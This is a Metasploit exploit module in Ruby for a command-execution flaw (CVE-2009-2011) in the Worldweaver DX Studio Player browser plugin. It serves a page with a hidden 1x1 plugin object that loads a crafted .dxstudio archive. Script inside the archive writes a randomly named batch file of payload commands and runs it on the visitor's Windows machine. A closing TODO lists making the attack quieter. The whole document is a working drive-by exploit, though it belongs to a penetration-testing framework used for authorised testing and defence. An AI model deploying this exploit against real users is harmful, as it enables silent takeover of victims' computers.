##
# $Id: dxstudio_player_exec.rb 8541 2010-02-17 20:14:40Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'
require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::CmdStager

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Worldweaver DX Studio Player <= 3.0.29 shell.execute() Command Execution',
			'Description'    => %q{
					This module exploits a command execution vulnerability within the
				DX Studio Player from Worldweaver. The player is a browser plugin for
				IE (ActiveX) and Firefox (dll). When an unsuspecting user visits a web 
				page referring to a specially crafted .dxstudio document, an attacker can
				execute arbitrary commands.

				Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20 and
				IE 6 on Windows XP SP3. In IE, the user will be prompted if they wish to allow
				the plug-in to access local files. This prompt appears to occur only once per 
				server host.

				NOTE: This exploit uses additionally dangerous script features to write to
				local files!
			},
			'License'        => MSF_LICENSE,
			'Author'         => [ 'jduck' ],
			'Version'        => '$Revision: 8541 $',
			'References'     =>
				[
					[ 'CVE', '2009-2011' ],
					[ 'BID', '35273' ],
					[ 'OSVDB', '54969' ],
					[ 'URL', 'http://www.exploit-db.com/exploits/8922' ],
					[ 'URL', 'http://dxstudio.com/guide.aspx' ]
				],
			'Payload'        =>
				{
					'Space'    => 2048,
				},
			'Platform'       => 'win',
			# 'Arch'           => ARCH_CMD,
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DisclosureDate' => 'Jun 09 2009',
			'DefaultTarget'  => 0))
	end

	def on_request_uri(cli, request)

		url_base =  "http://"
		url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
		url_base += ":" + datastore['SRVPORT'] + get_resource()

		payload_url = url_base + "/payload"

		# handle request for the payload
		if (request.uri.match(/payload/))

			# build the payload
			return if ((p = regenerate_payload(cli)) == nil)
			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)

			cmds = generate_cmdstager({}, 2047, p)
			scr = ""
			cmds.each_line { |ln|
				ln.chomp!
				scr << "  f.writeString('"
				scr << ln
				scr << "\\n');\n"
			}

			# make header.xml
			hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
  var f=system.file.openWrite("BATNAME");
  f.writeString('@echo off\\n');
CMDS
  f.close();
  shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
			hdrxml.gsub!(/CMDS/, scr);
			bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
			hdrxml.gsub!(/BATNAME/, bat_name);

			# craft the zip archive
			zip = Rex::Zip::Archive.new
			zip.add_file("header.xml", hdrxml)
			data = zip.pack

			print_status("Sending file.dxstudio payload to #{cli.peerhost}:#{cli.peerport}...")
			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
			
			# Handle the payload
			# handler(cli)
			return
		end

		# otherwise, send the html..
		html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
 <param name="src" value="DXURL" />
 <embed width=1 height=1 src=DXURL type="application/x-dxstudio">
 </embed>
</object>
</body>
</html>
|

		print_status("Sending #{self.name} HTML to #{cli.peerhost}:#{cli.peerport}...")
		# Transmit the compressed response to the client
		html.gsub!(/DXURL/, payload_url)
		send_response(cli, html, { 'Content-Type' => 'text/html' })

	end
end

=begin
TODO:
 - make it more quiet
 - auto-migrate?
=end